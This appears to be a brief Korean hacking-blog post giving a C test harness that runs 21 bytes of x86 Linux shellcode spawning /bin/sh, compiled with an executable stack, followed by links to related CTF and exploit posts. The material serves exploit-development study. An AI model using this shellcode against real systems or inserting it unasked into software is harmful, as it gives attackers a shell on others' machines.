#gcc -o shellcode shellcode.c -m32 -z execstack
#include<string.h> char shellcode[]="\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"; int main(){ int (*func)(); printf ("size : %d \n",strlen(shellcode)); func = shellcode; func(); return 0; }
|
'System_Hacking' 카테고리의 다른 글
angr 기본 코드 (0) | 2016.05.31 |
---|---|
CTF 바이너리 sockat 으로 xinetd 데몬처럼 띄우기 (0) | 2016.05.31 |
[검색용][python] Remote exploit 할때 기본 포멧 (0) | 2016.05.06 |
SPI 통신으로 firmware dump 뜨기 (0) | 2016.02.21 |
QEMU 돌릴때 포트포워딩 옵션 (0) | 2016.02.21 |